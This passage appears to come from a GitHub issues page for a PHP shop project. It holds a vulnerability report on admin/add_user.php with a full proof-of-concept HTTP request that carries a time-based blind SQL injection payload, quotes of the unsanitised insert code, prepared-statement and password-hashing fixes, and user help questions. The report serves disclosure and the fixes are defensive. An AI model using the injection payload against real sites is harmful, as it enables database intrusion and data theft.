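    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($dir, '/\\') . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store upload');
    }
    return $name;   // save this value as products.product_image
}

// Usage in admin/add_product.php
if (isset($_FILES['picture'])) {
    try {
        $pic_name = store_product_image($_FILES['picture'], __DIR__ . '/../product_images');
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit('Picture rejected: ' . $e->getMessage());
    }
}
```

As a second layer, the web server should be configured not to run scripts from the product_images directory at all.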

Found a vulnerability

Vulnerability file address

admin/add_user.php, from line 7: the $first_name parameter is controllable; the parameter first_name can be passed through POST, and $first_name is not protected from SQL injection, resulting in SQL injection.

if(isset($_POST['btn_save']))
{
$first_name=$_POST['first_name'];
$last_name=$_POST['last_name'];
$email=$_POST['email'];
$user_password=$_POST['user_password'];
$mobile=$_POST['mobile'];
$address1=$_POST['address1'];
$address2=$_POST['address2'];

mysqli_query($con,"insert into user_info(first_name, last_name,email,password,mobile,address1,address2) values ('$first_name','$last_name','$email','$user_password','$mobile','$address1','$address2')") 
			or die ("Query 1 is inncorrect........");
header("location: manage_users.php"); 
mysqli_close($con);

POC

POST /admin/add_user.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/admin/add_user.php
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

first_name=1'+(SELECT 0x6e504162 WHERE 1952=1952 AND (SELECT 6458 FROM (SELECT(SLEEP(5)))rFne))+'&last_name=1&email=1&user_password=1&mobile=1&address1=1&address2=1&btn_save=

Attack results pictures

image-20220729215019850

SQL Injection in Login.php

I noticed the password input is not sanitized in login.php. This can lead to an attacker performing an SQL Injection attack.
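
The login.php report above, the register.php injection and the "Password not encrypted" issue all meet in the same two routines. The sketch below is an added example, not code from the repository; it assumes `$con` is the mysqli connection from db.php and uses the `user_info` columns and the `uid` / `name` session keys that appear in snippets quoted on this page. `register_user` and `login_user` are hypothetical names.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. get_result() needs mysqlnd.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on DB errors

/**
 * register.php: insert a user with a hashed password and bound parameters.
 * $in holds the form fields named in the quoted register.php snippet.
 * Returns the new user_id.
 */
function register_user(mysqli $con, array $in): int
{
    // password_hash() output is longer than an MD5 digest; the PHP manual
    // recommends a 255-character column for it.
    $hash = password_hash($in['password'], PASSWORD_DEFAULT);

    $stmt = $con->prepare(
        'INSERT INTO user_info
             (first_name, last_name, email, password, mobile, address1, address2)
         VALUES (?, ?, ?, ?, ?, ?, ?)'
    );
    $stmt->bind_param(
        'sssssss',
        $in['f_name'], $in['l_name'], $in['email'], $hash,
        $in['mobile'], $in['address1'], $in['address2']
    );
    $stmt->execute();
    $user_id = (int) $stmt->insert_id;
    $stmt->close();
    return $user_id;
}

/**
 * login.php: look the user up by email with a bound parameter, then verify
 * the password in PHP instead of comparing it inside the SQL text.
 */
function login_user(mysqli $con, string $email, string $password): bool
{
    $stmt = $con->prepare(
        'SELECT user_id, first_name, password FROM user_info WHERE email = ? LIMIT 1'
    );
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // No matching row: stop before $row is read as an array.
    if (!$row || !password_verify($password, $row['password'])) {
        return false;
    }

    session_regenerate_id(true);          // do not keep the pre-login session id
    $_SESSION['uid']  = $row['user_id'];
    $_SESSION['name'] = $row['first_name'];
    return true;
}

// Usage in login.php, after session_start() and include "db.php":
//   if (!login_user($con, $_POST['email'] ?? '', $_POST['password'] ?? '')) {
//       exit('Invalid email or password');
//   }
```

Rows whose password column still holds a plaintext or MD5 value will not pass `password_verify()`, so existing accounts need a password reset after this change.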

Requested url not found

Actually, the given instructions are for Windows and I am a Linux user. I imported the database in phpMyAdmin and when I opened the link given in instruction 10, it said 404 not found. So can somebody please help me with it?
Thanks

action.php

I cannot understand the code on lines 447, 448 and 449.
Subscribe does not work, pls help me.
